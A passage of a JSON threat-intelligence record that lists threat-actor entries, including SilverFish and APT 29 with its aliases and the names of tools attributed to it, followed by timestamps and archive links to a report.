"FakeUpdate", "SocGholish" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "821d8858-a784-4ab2-9ecb-56c7afeed7d7", "created_at": "2023-11-21T02:00:07.403629Z", "updated_at": "2026-04-10T02:00:03.479942Z", "deleted_at": null, "main_name": "SilverFish", "aliases": [], "source_name": "MISPGALAXY:SilverFish", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434295, "ts_updated_at": 1775826684, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6e9553c0cd65809465809a31b2814f4f26acbefd.pdf", "text": "https://archive.orkl.eu/6e9553c0cd65809465809a31b2814f4f26acbefd.txt", "img": "https://archive.orkl.eu/6e9553c0cd65809465809a31b2814f4f26acbefd.jpg" } }